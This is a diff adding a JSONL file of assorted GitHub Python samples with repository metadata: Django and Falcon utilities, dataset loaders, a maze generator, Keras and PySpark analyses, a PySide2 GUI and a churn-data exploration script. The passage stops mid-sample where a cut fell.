diff --git "a/5743.jsonl" "b/5743.jsonl" new file mode 100644--- /dev/null +++ "b/5743.jsonl" @@ -0,0 +1,226 @@ +{"seq_id":"46854921018","text":"from django.template.defaultfilters import slugify\n\nSTATUS_CHOICES = {\n 'Draft': 0,\n 'Pending': 1,\n 'Published': 2\n}\n\nROLE_CHOICES = {\n 'Administrator': 0,\n 'Editor': 1,\n 'Author': 2,\n 'Contributor': 3,\n 'Follower': 4\n}\n\n\ndef has_enough_privileges(actual_level, required_group):\n return actual_level <= ROLE_CHOICES[required_group]\n\n\n# Only used to set publication_date\ndef has_changed(instance, field):\n if not instance.pk:\n return False\n old_value = instance.__class__._default_manager.filter(\n pk=instance.pk).values(field).get()[field]\n return not getattr(instance, field) == old_value\n\n\n# Should be improved\ndef unique_slug(string, target_class):\n slug = slugify(string)\n slug_exists = True\n counter = 1\n output = slug\n while slug_exists:\n try:\n slug_exits = target_class.objects.get(slug=slug)\n if slug_exits:\n slug = output + '_' + str(counter)\n counter += 1\n except target_class.DoesNotExist:\n output = slug\n break\n return output\n","repo_name":"iago1460/lightweight-django-blog","sub_path":"blog/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"12316722513","text":"# ArXivPully.py file\n\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nfrom falcon import API\n\nclass ArXivPully:\n def pull_from_arxiv(self,search_query, num_results=10):\n url = 'https://export.arxiv.org/api/query'\n params = {'search_query': f'all:{search_query}',\n 'start': 0,\n 'max_results': num_results} \n data = requests.get(url,params=params).text\n soup = BeautifulSoup(data, 'lxml')\n # ArXiv populates the the first title value as the search query \n titles = soup.find_all('title')[1:]\n bodies = soup.find_all('summary')\n links = soup.find_all('link', title='pdf')\n for title, body, link in zip(titles, bodies, links):\n yield {'link': link['href'],\n 'title': title.text.strip().replace('\\n',' '),\n 'body': title.text.strip().replace('\\n',' ')}\n \n\n def on_get(self, req, resp):\n \"\"\"Handles GET requests\"\"\"\n resp.media = json.dumps({search_query : list(self.pull_from_arxiv(search_query, num_results)) for search_query, num_results in req.params.items()})\n\napi = API()\napi.add_route('/api/query', ArXivPully())","repo_name":"evader110/ArXivPully","sub_path":"ArXivPully.py","file_name":"ArXivPully.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"27841503489","text":"#FUNCTIONS WITH OUTPUTS\n# def format_name():\n# f_name =\"Hitesh\"\n# l_name = \"N\"\n# return f_name,l_name\n# result={\"Name\":[format_name()]}\n# print(result)\n#--------------------------------\n# def format_name(f_name,l_name):\n# f_name=f_name.title()\n# l_name=l_name.title()\n# return f_name,l_name\n# f_name =input(\"Fisrt Name:\").lower()\n# l_name =input(\"lower case:\").lower()\n# result={\"Name\":[format_name(f_name,l_name)]}\n# print(result)\n#-----------------------------------\n# def format_name(f_name,l_name):\n# if f_name=='' or l_name=='':\n# return \"Provide Valid inputs\"\n# else:\n# f_name =f_name.title()\n# l_name = l_name.title()\n# return f'Resule:{f_name} {l_name}'\n# print(format_name(input(\"Enter Firstname:\").lower(),input(\"Enter 
Lastname:\").lower()))\n#-----------------------------------------------------------------------------\n# def is_leap(year):\n# if year % 4 == 0:\n# if year % 100 == 0:\n# if year % 400 == 0:\n# # print(\"Leap year.\")\n# return True\n# else:\n# # print(\"Not leap year.\")\n# return False\n# else:\n# # print(\"Leap year.\")\n# return True\n# else:\n# # print(\"Not leap year.\")\n# return False\n#\n# def days_in_month(year,month):\n# month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n# if year== False:\n# return month_days[month-1]\n# elif year== True:\n# if month==2:\n# return month_days[month-1]+1\n# else:\n# return month_days[month-1]\n# days = days_in_month(is_leap(int(input(\"Enter a year: \"))),int(input(\"Enter a month: \")))\n# print(days)\n#----------------------------------------------------------\n#calculator\nfrom Calculator_art import logo\ndef add(n1,n2):\n '''Adds two Numbers'''\n return n1+n2\ndef sub(n1,n2):\n '''Subtracts Two numbers'''\n return n1-n2\ndef mul(n1,n2):\n '''Multiplies two numbers'''\n return n1*n2\ndef divide(n1,n2):\n '''Divide two numbers'''\n return round((n1/n2),4)\n\n\noperations ={\n\"+\":add,\n\"-\":sub,\n\"*\":mul,\n\"/\":divide\n}\ndef Calculator():\n '''This fuction will calculate the values for the set of\n operations the user enter and user can also wish to continue\n by:yes or no or refresh accordingly'''\n print(logo)\n n1 = float(input(\"Enter the First Number:\"))\n to_continue = \"yes\"\n while to_continue=='yes':\n for operator in operations:\n print(operator)\n chosen_operator = input(\"Enter the operator:\")\n operation_func = operations[chosen_operator]\n n2 = float(input(\"Enter the Second Number:\"))\n answer = operation_func(n1,n2)\n print(f\"{n1}{chosen_operator}{n2} = {answer}\")\n to_continue = input(\"Do you wish to continue?Type 'yes','no''refresh':\").lower()\n n1 = answer\n if to_continue==\"no\":\n print(\"Good Bye!\")\n elif to_continue=='refresh':\n Calculator()\nCalculator()","repo_name":"Hit07/Python-Days","sub_path":"Day_10.py","file_name":"Day_10.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4328654529","text":"from .maze_algorithm import (\n MazeAlgorithm,\n randrange,\n choice,\n)\nfrom maze_generator.maze.algorithm.helper.priority_queue import PriorityQueue\n\n\nclass Prim(MazeAlgorithm):\n name = \"Prim\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.bias = round((1 - abs(self.bias)) * 10)\n\n self.q = PriorityQueue()\n self.run()\n self.color_cells_by_tree_root()\n\n def run(self):\n start_cell = self.grid.random_cell()\n self.push_to_queue(start_cell)\n\n while not self.q.is_empty():\n cell, neighbor = self.q.pop()\n if not self.grid.connected(cell, neighbor):\n self.grid.link(cell, neighbor)\n self.push_to_queue(neighbor)\n self.push_to_queue(cell)\n\n def push_to_queue(self, cell):\n try:\n self.q.push((cell, choice(cell.get_unlinked_neighbors())), randrange(0, self.bias + 1))\n except IndexError:\n pass\n","repo_name":"Gorgious56/MazeGenerator","sub_path":"maze_generator/maze/algorithm/algorithms/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"35"} +{"seq_id":"35270239740","text":"encoding='utf-8'\n\nimport csv\nimport os\n\ndict_pm={}\n\nwith open('corpus/metadata.csv', 'r', encoding='utf-8') as f: #or encoding='utf-8' or 'latin-1' or 
'iso-8859-1' or 'mac_roman'\n    reader = csv.reader(f)\n    data = list(reader)\n\nfor i in data[1:]: #column number 2 in the csv will be noted 1 in here. Pick the column to group by and change lines below accordingly.\n    print(i[0], i[1])\n    if i[1] not in dict_pm:\n        dict_pm[i[1]]=\"\"\n    with open(f'corpus/{i[0]}.txt', 'r') as f:\n        text= f.read()\n    dict_pm[i[1]]= dict_pm[i[1]] + text + \" \"\n\nfor key in dict_pm.keys():\n    with open(f'combined/{key}.txt', \"w\") as outfile: #create folder \"combined\" beforehand, or \"os.makedirs('combined')\" to create one\n        outfile.write(dict_pm[key])","repo_name":"jtmart/text-processing","sub_path":"workflow/7groupby.py","file_name":"7groupby.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"42004329165","text":"from __future__ import division\nimport numpy as np \nfrom sklearn import neighbors\nfrom sklearn.metrics import accuracy_score\n\ndef knn_val(features_train, labels_train, features_val, labels_val):\n    x = features_train\n    y = labels_train\n    x_val = features_val\n    y_val = labels_val\n    z = 0\n    sumCorrect = 0\n    \n    knn = neighbors.KNeighborsClassifier(n_neighbors=1)\n    knn.fit(x, y)\n    y_predict = knn.predict(x_val)\n    #y_predict = b.tolist()\n    #val_len = len(features_val)\n    #print(len(y_predict))\n    #print(len(labels_val))\n    #print(y_predict)\n    #print(labels_val)\n    #return\n    #tot = 0\n    #for i in range(len(y_predict)):\n    #    if y_predict[i] == labels_val[i]:\n    #        tot += 1\n\n    return accuracy_score(labels_val, y_predict)#float(tot)/len(y_predict)\n    '''\n    i = 0\n    for array in y:\n        try:\n            temp = array.index(1)\n            pass\n        except ValueError:\n            temp = 9\n        if temp == Z[i]:\n            sumCorrect = sumCorrect+1\n        i = i + 1\n    \n    accuracy = sumCorrect/val_len\n    print(sumCorrect)\n    result = [b]\n    print result\n    result.append(accuracy)\n    return result\n    '''\n","repo_name":"markelsanz14/Image-Classification-Kaggle","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74359764260","text":"import json\n\nimport jsonlines\n\nfrom Data_Loader import DataLoader\n\nclass GSM8K_DataLoader(DataLoader):\n    def __init__(self, file_path=\"../dataset/grade-school-math/test.jsonl\") -> None:\n        super().__init__(file_path)\n\n    def get_comparable_answer(self, answer) -> str:\n        return answer.split(\"#### \")[-1]\n    \n    def get_data(self):\n        question_list, answer_list = self.read_jsonl(self.file_path)\n        question_list = [question.strip() for question in question_list]\n        # string\n        comparable_answer_list = [self.get_comparable_answer(answer) for answer in answer_list]\n        return question_list, comparable_answer_list\n    \nclass GSM8K_Hard_DataLoader(DataLoader):\n    def __init__(self, file_path=\"../dataset/GSM8KHard/gsmhardv2_test.jsonl\") -> None:\n        super().__init__(file_path)\n\n    def get_data(self):\n        question_list = []\n        answer_list = []\n        with jsonlines.open(self.file_path) as reader:\n            for obj in reader:\n                question = obj[\"input\"]\n                answer = str(obj[\"target\"])\n                if answer[-2:] == \".0\":\n                    answer = answer[:-2]\n                question_list.append(question)\n                answer_list.append(answer)\n        return question_list, answer_list\n\nclass SingleOP_DataLoader(GSM8K_Hard_DataLoader):\n    def __init__(self, file_path=\"../dataset/SingleOP/mawpssingleop.jsonl\") -> None:\n        super().__init__(file_path)\n\nclass ASDIV_DataLoader(GSM8K_Hard_DataLoader):\n    def __init__(self, file_path=\"../dataset/ASDIV/asdiv.jsonl\") -> None:\n        
super().__init__(file_path)\n\nclass AddSub_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/AddSub/AddSub.json\") -> None:\n super().__init__(file_path)\n\n def get_data(self):\n question_list = []\n answer_list = []\n with open(self.file_path) as f:\n json_data = json.load(f)\n for line in json_data:\n q = line[\"sQuestion\"].strip()\n a = str(line[\"lSolutions\"][0])\n if a[-2:] == \".0\":\n a = a[:-2]\n question_list.append(q)\n answer_list.append(a)\n return question_list, answer_list\n \nclass MultiArith_DataLoader(AddSub_DataLoader):\n def __init__(self, file_path=\"../dataset/MultiArith/MultiArith.json\") -> None:\n super().__init__(file_path)\n\nclass SingleEq_DataLoader(AddSub_DataLoader):\n def __init__(self, file_path=\"../dataset/SingleEq/questions.json\") -> None:\n super().__init__(file_path)\n\nclass AQuA_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/AQuA/test.json\") -> None:\n super().__init__(file_path)\n \n def get_data(self):\n decoder = json.JSONDecoder()\n question_list = []\n answer_list = []\n with open(self.file_path) as f:\n lines = f.readlines()\n for line in lines:\n json_res = decoder.raw_decode(line)[0]\n choice = \"(\" + \"(\".join(json_res[\"options\"])\n choice = choice.replace(\"(\", \" (\").replace(\")\", \") \")\n choice = \"Answer Choices:\" + choice\n question_list.append(json_res[\"question\"].strip() + \"\\n\" + choice)\n answer_list.append(json_res[\"correct\"])\n return question_list, answer_list\n\nclass SVAMP_DataLoader(DataLoader):\n def __init__(self, file_path=\"../dataset/SVAMP/SVAMP.json\") -> None:\n super().__init__(file_path)\n \n def get_data(self):\n question_list = []\n answer_list = []\n with open(self.file_path) as f:\n json_data = json.load(f)\n for line in json_data:\n q = line[\"Body\"].strip() + \" \" + line[\"Question\"].strip()\n a = str(line[\"Answer\"])\n if a[-2:] == \".0\":\n a = a[:-2]\n question_list.append(q)\n answer_list.append(a)\n return question_list, answer_list","repo_name":"QiushiSun/Corex","sub_path":"utils/Math_Loaders.py","file_name":"Math_Loaders.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"28217344790","text":"\"\"\" Eczacibasi activity comparison module \"\"\"\nfrom datetime import datetime\nfrom util import date_time, ecz_daha\nfrom model.timesheet.activity import Activity\nimport config\n\nclass EczActivityComparisonAPI():\n \"\"\" Eczacibasi activity comparison class \"\"\"\n def __init__(self):\n self._result = {}\n self._ecz = config.CONSTANTS[\"COMPANY_NAME_ECZ_TUG\"]\n\n @property\n def result(self) -> dict:\n \"\"\" Returns output \"\"\"\n self._result = {\"ThisMonth\": [], \"PrevMonth\": []}\n\n this_year = datetime.now().year\n this_month = datetime.now().month\n self._append_month(this_year, this_month, \"ThisMonth\")\n\n prev_year = this_year\n prev_month = this_month - 1\n if prev_month == 0:\n prev_year -= 1\n prev_month = 12\n self._append_month(prev_year, prev_month, \"PrevMonth\")\n\n return self._result\n\n def _append_month(self, year: int, month: int, elem: str):\n sap_year = str(year)\n sap_month = date_time.get_two_digit_month(month)\n ecz_activities = ecz_daha.get_monthly_activity(p_sap_year=sap_year, p_sap_month=sap_month)\n\n for ecz_activity in ecz_activities:\n date_of_activity = date_time.parse_sap_date(ecz_activity[\"date\"])\n\n kifu_hour_sum = Activity.get_time_sum(client_name=self._ecz,\n date=date_of_activity)\n\n date = 
date_time.get_formatted_date(date_time.parse_sap_date(ecz_activity[\"date\"]))\n\n entry = {\"date\": date,\n \"comment\": ecz_activity[\"comment\"],\n \"ecz_hours\": ecz_activity[\"hours\"],\n \"kifu_hours\": kifu_hour_sum,\n \"different\": kifu_hour_sum != ecz_activity[\"hours\"]}\n\n self._result[elem].append(entry)\n","repo_name":"keremkoseoglu/Kifu","sub_path":"web/api/ecz_activity_comparison.py","file_name":"ecz_activity_comparison.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32663124050","text":"from django.core.management.base import BaseCommand\n\nimport json\nfrom pprint import pprint\n\nfrom network_ui_dev.models import EventTrace, FSMTrace, TopologySnapshot\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('topology_id', type=int)\n parser.add_argument('trace_id', type=int)\n parser.add_argument('client_id', type=int)\n\n def handle(self, *args, **options):\n topology_id = options['topology_id']\n trace_id = options['trace_id']\n client_id = options['client_id']\n\n data = dict()\n data['event_trace'] = [json.loads(x) for x in EventTrace\n .objects.filter(trace_session_id=trace_id, client_id=client_id)\n .order_by('message_id')\n .values_list('event_data', flat=True)]\n data['fsm_trace'] = list(FSMTrace\n .objects\n .filter(trace_session_id=trace_id, client_id=client_id)\n .order_by('order')\n .values())\n data['snapshots'] = [json.loads(x) for x in TopologySnapshot\n .objects.filter(topology_id=topology_id,\n trace_session_id=trace_id,\n client_id=client_id)\n .order_by('order')\n .values_list('snapshot_data', flat=True)]\n\n with open('recording_{0}_{1}_{2}.json'.format(topology_id, trace_id, client_id), 'w') as f:\n f.write(json.dumps(data, sort_keys=True, indent=4))\n","repo_name":"benthomasson/network-ui","sub_path":"network_ui_dev/management/commands/get_recording.py","file_name":"get_recording.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10440474415","text":"from PyQt5.QtCore import QObject, pyqtSignal, Qt, QThread\nfrom settings import *\nimport time\nimport random\n\nclass Switch(QThread):\n \n change_val_signal = pyqtSignal(int)\n def __init__(self, port, caja, parent:QObject):\n super().__init__(parent)\n \n self.run_flag = True\n self.button = port\n self.texto = caja\n GPIO.setup(port, GPIO.IN, GPIO.PUD_UP)\n print()\n\n def run(self):\n while self.run_flag:\n boton = GPIO.input(self.button)\n #random.randint(0,100) #\n #self.texto.setText(str(boton))\n self.change_val_signal.emit(boton)\n time.sleep(1)\n\n def stop(self):\n self.run_flag = False\n GPIO.cleanup(self.button)\n self.wait()","repo_name":"codeplaigames/ESANGUI","sub_path":"Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35769891095","text":"from django import forms\nfrom currencies.models import ExchangeRate, ExchangeRate_name\n\n\nclass CurrenciesForm(forms.Form):\n currencies = forms.ModelChoiceField(\n queryset=ExchangeRate_name.objects.all(),\n required=False,\n empty_label='CHF',\n label='CURENCIES',\n # widget=forms.Select(\n # attrs={\n # 'onchange': 'currency.submit();',\n # 'class': 'btn-primary dropdown-toggle'\n # }\n #)\n 
)\n","repo_name":"Nebucatnetzer/webtech_case_study","sub_path":"django/didgeridoo/currencies/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4405478359","text":"from keras.models import Sequential \nfrom keras.layers import Dense,Activation,Dropout \nfrom keras.layers.normalization import BatchNormalization \nfrom keras.utils import np_utils\nfrom sklearn.preprocessing import normalize\nfrom sklearn import metrics\nimport pandas as pd\n\ndata=pd.read_csv('cardio_train.csv', sep=';')\n\ndata = data.sample(frac=1.0)\n\nX = data.drop(['id','cardio'], axis=1)\nY = data['cardio']\n\nX_normalized=normalize(X,axis=0)\n\ntotal_length=len(data)\ntrain_length=int(0.8*total_length)\ntest_length=int(0.2*total_length)\n\nx_train=X_normalized[:train_length]\nx_test=X_normalized[train_length:]\ny_train=Y[:train_length]\ny_test=Y[train_length:]\n\ny_train=np_utils.to_categorical(y_train,num_classes=2)\ny_test=np_utils.to_categorical(y_test,num_classes=2)\n\nmodel=Sequential()\nmodel.add(Dense(1000,input_dim=11,activation='relu'))\nmodel.add(Dense(500,activation='relu'))\nmodel.add(Dense(300,activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(2,activation='softmax'))\nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n\nmodel.fit(x_train,y_train,validation_data=(x_test,y_test),batch_size=20,epochs=10,verbose=1)\n\ny_pred=model.predict(x_test)\n\nprint(\"Sieć neuronowa\")\nprint(metrics.accuracy_score(y_test.argmax(axis=1), y_pred.argmax(axis=1)))\nprint(metrics.confusion_matrix(y_test.argmax(axis=1), y_pred.argmax(axis=1)))","repo_name":"malgorzatasz/io","sub_path":"SiecNeuronowa.py","file_name":"SiecNeuronowa.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70171160421","text":"import sys\nimport time\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import *\n\nfrom mouse_keyboard import * \n\n\nclass Form(QDialog): # QDialog是窗口类\n \n def __init__(self, parent=None): #没有parent的是最上层的窗口 \n \"\"\"初始化布局\"\"\"\n super().__init__(parent) #父类初始化父类的\n self.setWindowTitle(\"mycopy\") #子类初始化子类的,设置标题\n self.setWindowIcon(QIcon(\"mycopy.jpg\"))\n self.resize(50,50)\n\n # Set dialog layout\n layout = QVBoxLayout()\n\n self.Qtable_id = QLineEdit(\"6.1\")\n layout.addWidget(self.Qtable_id)\n self.Qtable_id.setValidator(QDoubleValidator(6,12,2))\n\n self.Qdown_push = QPushButton(self)\n layout.addWidget(self.Qdown_push)\n self.Qdown_push.setText(u\" 自动下载 \")\n self.Qdown_push.clicked.connect(self.down_push)\n\n\n self.Qcopy_line = QLabel((u'浏1定位math2(4)右上角')) #还能再显示20个字符\n layout.addWidget(self.Qcopy_line)\n self.Qcopy_line.setFrameStyle(QFrame.Panel | QFrame.Sunken) #带凹陷的\n self.Qcopy_line.setStyleSheet(\"color:#FF3333\")\n\n\n Qcopy_grid = QGridLayout()\n layout.addLayout(Qcopy_grid)\n \n self.Qcopy_edit = QLineEdit('')\n Qcopy_grid.addWidget(self.Qcopy_edit, 0 ,0)\n self.Qcopy_edit.setValidator(QIntValidator(0,100))\n\n self.Qcopy_push = QPushButton(self)\n Qcopy_grid.addWidget(self.Qcopy_push, 0, 1)\n self.Qcopy_push.setText(u\" 快速复制 \")\n self.Qcopy_push.clicked.connect(self.quick_copy)\n\n\n Qcopy_plus_grid = QGridLayout()\n layout.addLayout(Qcopy_plus_grid)\n\n self.Qcopy_plus_edit = QLineEdit('')\n Qcopy_plus_grid.addWidget(self.Qcopy_plus_edit, 0 ,0)\n 
self.Qcopy_plus_edit.setValidator(QIntValidator(0,100))\n\n        self.Qcopy_plus_push = QPushButton(self)\n        Qcopy_plus_grid.addWidget(self.Qcopy_plus_push, 0, 1)\n        self.Qcopy_plus_push.setText(u\" 高级复制 \")\n        self.Qcopy_plus_push.clicked.connect(self.plus_copy)\n\n        self.setLayout(layout)\n\n\n    def quick_copy(self):\n        times = self.Qcopy_edit.text()\n        times = int(times)\n        copy(times)\n\n    def plus_copy(self):\n        times = self.Qcopy_plus_edit.text()\n        times = int(times)\n        copy_plus(times)\n\n    def down_push(self):\n        table_id = self.Qtable_id.text()\n        download(table_id)\n\n\nif __name__ == '__main__':\n    # Create the Qt Application\n    app = QApplication(sys.argv)\n    # Create and show the form\n    form = Form()\n    form.show()\n    # Run the main Qt loop until exit() is called, i.e. run the program\n    sys.exit(app.exec_())  # the earlier show() call does not render by itself; the window appears through the nested calls here\n\n","repo_name":"awesome-yyh/math_pyside2","sub_path":"mathplus/web/mycopy.py","file_name":"mycopy.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4698454296","text":"#!/usr/bin/env python3\n\"\"\"reviewed_productsSQL.py\"\"\"\n\nimport argparse\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType, StructField, StringType, IntegerType\nimport time\nfrom datetime import datetime\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.functions import row_number, split, explode, count, from_unixtime, year, desc, length, lower, regexp_replace, col\n\n# Parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--input\", help=\"the input path\")\nparser.add_argument(\"--output\", help=\"the output path\")\n\nargs = parser.parse_args()\n\ninput_path, output_path = args.input, args.output\n\n# Create the SparkSession\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\n\n# Define the schema structure\nschema = StructType([\n    StructField(\"Id\", IntegerType(), True),\n    StructField(\"productId\", StringType(), True),\n    StructField(\"userId\", StringType(), True),\n    StructField(\"profileName\", StringType(), True),\n    StructField(\"helpfulnessNumerator\", IntegerType(), True),\n    StructField(\"helpfulnessDenominator\", IntegerType(), True),\n    StructField(\"score\", StringType(), True),\n    StructField(\"time\", IntegerType(), True),\n    StructField(\"summary\", StringType(), True),\n    StructField(\"text\", StringType(), True)\n])\n\n# calculate time elapsed\nstart_time = time.time()\n\n# read from csv file\ninput_df = spark.read.option(\"quote\", \"\\\"\") \\\n    .csv(input_path, header=True, schema=schema) \\\n    .cache()\n\n# preprocessing, remove html tags and convert to lower case\npunctuation_pattern = \"[!\\\"#$%&'()*+,-./:;<=>?@\\\\[\\\\\\\\\\\\]^_`{|}~<>]\"\ninput_df = input_df.withColumn(\"text\", lower(regexp_replace(col(\"Text\"), f\"<.*?>|{punctuation_pattern}\", \"\"))).cache()\n\n# convert unix_timestamp to year\ninput_df = input_df.withColumn(\"time\", input_df[\"time\"].cast(\"timestamp\"))\ninput_df = input_df.withColumn(\"year\", year(from_unixtime(input_df[\"time\"].cast(\"bigint\")))).cache()\n\n# use sql to calculate the top 10 reviewed products for each year\n# and append for each product the top 5 words used in the text field\n# of the reviews\n\n# calculate the top 10 most reviewed products for each year\ndf_with_reviews_number = input_df.groupBy(\"year\", \"productId\").agg(count(\"*\").alias(\"review_count\")).cache()\n\nwindow = 
Window.partitionBy(\"year\").orderBy(desc(\"review_count\"))\n\ndf_with_top = df_with_reviews_number.withColumn(\"row_number\", row_number().over(window))\n\ndf_with_top = df_with_top.filter(df_with_top[\"row_number\"] <= 10).drop(\"row_number\").cache()\n\n# calculate the top 5 words for each product in each year\n# split the text field into words\ndf_with_words = input_df.withColumn(\"words\", explode(split(input_df[\"text\"], \" \"))).cache()\n\ndf_with_words = df_with_words.filter(length(df_with_words[\"words\"]) > 3).groupBy(\"year\", \"productId\", \"words\").agg(count(\"*\").alias(\"word_count\")).cache()\n\nwindow = Window.partitionBy(\"year\", \"productId\").orderBy(desc(\"word_count\"))\n\ndf_with_top_words = df_with_words.withColumn(\"row_number\", row_number().over(window))\ndf_with_top_words = df_with_top_words.filter(df_with_top_words[\"row_number\"] <= 5).drop(\"row_number\").cache()\n\n# join the two dataframes\nfinal_df = df_with_top.join(df_with_top_words, [\"year\", \"productId\"]).cache()\n\nend_time = time.time()\n\n# save the output\nfinal_df.write.csv(output_path, mode = \"overwrite\")\n# Print the time elapsed\nprint(\"Time elapsed: \", end_time - start_time)","repo_name":"LeafTeamMates/BigData1","sub_path":"Job1/Spark/reviewed_productsSQL.py","file_name":"reviewed_productsSQL.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11059185289","text":"#! /usr/bin/env python\n\nimport sys\nfrom collections import OrderedDict\n\n\ndef render_golang(matrix):\n result = []\n result.append('{')\n for key1, row in matrix.items():\n if key1 in ('B', 'Z', 'X'):\n continue\n result.append('\\t{}: {{'.format(key1))\n for key2, score in row.items():\n if key2 in ('B', 'Z', 'X'):\n continue\n result.append('\\t\\t{}: {},'.format(key2, score))\n result.append('\\t},')\n result.append('}')\n return '\\n'.join(result)\n\n\ndef text2matrix(fname):\n matrix = OrderedDict()\n with open(fname) as fp:\n [*keys] = fp.readline().strip()\n for key1, line in zip(keys, fp):\n vals = line.split()\n for key2, val in zip(keys, vals):\n matrix.setdefault(key1, OrderedDict())[key2] = val\n matrix.setdefault(key2, OrderedDict())[key1] = val\n return matrix\n\n\ndef main():\n fname = sys.argv[1]\n matrix = text2matrix(fname)\n print(render_golang(matrix))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hivdb/nucamino","sub_path":"scripts/make_blosum.py","file_name":"make_blosum.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"28219943328","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndataset = pd.read_csv(\"C:\\\\Users\\\\himal\\\\Desktop\\\\Machine Learning Practicals\\\\P4- Minimizing Churn Rate through Analysis of Financial Habits\\\\P39-Minimizing-Churn-Data\\\\churn_data.csv\") # Users who were 60 days enrolled, churn in the next 30\r\n\r\n# EDA\r\n# print(dataset.head(5))\r\n# print(dataset.columns)\r\n# print(dataset.describe())\r\n# print(dataset.isna().any())\r\n# print(dataset.isna().sum())\r\ndataset=dataset[pd.notnull(dataset['age'])]\r\ndataset = dataset.drop(columns = ['credit_score', 'rewards_earned'])\r\n\r\n# Histograms\r\ndataset2 = dataset.drop(columns=['user', 'churn','housing','payment_type','zodiac_sign'])\r\nfig = plt.figure(figsize=(20, 15))\r\nplt.suptitle('Histograms of Numerical Columns', 
fontsize=20)\r\nfor i in range(1, dataset2.shape[1] + 1):\r\n    plt.subplot(6, 4, i)\r\n    f = plt.gca()\r\n    f.axes.get_yaxis().set_visible(False)\r\n    f.set_title(dataset2.columns.values[i - 1])\r\n    vals = np.size(dataset2.iloc[:, i - 1].unique())\r\n    plt.hist(dataset2.iloc[:, i - 1], bins=vals, color='#FF0077')\r\nfig.tight_layout(rect=[0, 0.03, 1, 0.95])\r\nplt.show()\r\n\r\n# Pie Charts\r\ndataset2 = dataset[['housing', 'is_referred', 'app_downloaded',\r\n                    'web_user', 'app_web_user', 'ios_user',\r\n                    'android_user', 'registered_phones', 'payment_type',\r\n                    'waiting_4_loan', 'cancelled_loan',\r\n                    'received_loan', 'rejected_loan', 'zodiac_sign',\r\n                    'left_for_two_month_plus', 'left_for_one_month', 'is_referred']]\r\nfig = plt.figure(figsize=(15, 12))\r\nplt.suptitle('Pie Chart Distributions', fontsize=20)\r\nfor i in range(1, dataset2.shape[1] + 1):\r\n    plt.subplot(5, 4, i)\r\n    f = plt.gca()\r\n    f.axes.get_yaxis().set_visible(False)\r\n    f.set_title(dataset2.columns.values[i - 1])\r\n    values = dataset2.iloc[:, i - 1].value_counts(normalize=True).values\r\n    index = dataset2.iloc[:, i - 1].value_counts(normalize=True).index\r\n    plt.pie(values, labels=index, autopct='%1.1f%%')\r\n    plt.axis('equal')\r\nfig.tight_layout(rect=[0, 0.03, 1, 0.95])\r\nplt.show()\r\n# Exploring Uneven Features\r\nprint(dataset[dataset2.waiting_4_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.cancelled_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.received_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.rejected_loan == 1].churn.value_counts())\r\nprint(dataset[dataset2.left_for_one_month == 1].churn.value_counts())\r\n\r\n# Correlation with the Response Variable\r\ndataset.drop(columns=['user', 'churn', 'housing', 'payment_type',\r\n                      'registered_phones', 'zodiac_sign']).corrwith(dataset.churn).plot.bar(\r\n        figsize=(20,10),title = 'Correlation with Response variable',\r\n        fontsize = 15, rot = 45,\r\n        grid = True)\r\nplt.tight_layout()\r\nplt.show()\r\n\r\n# Correlation 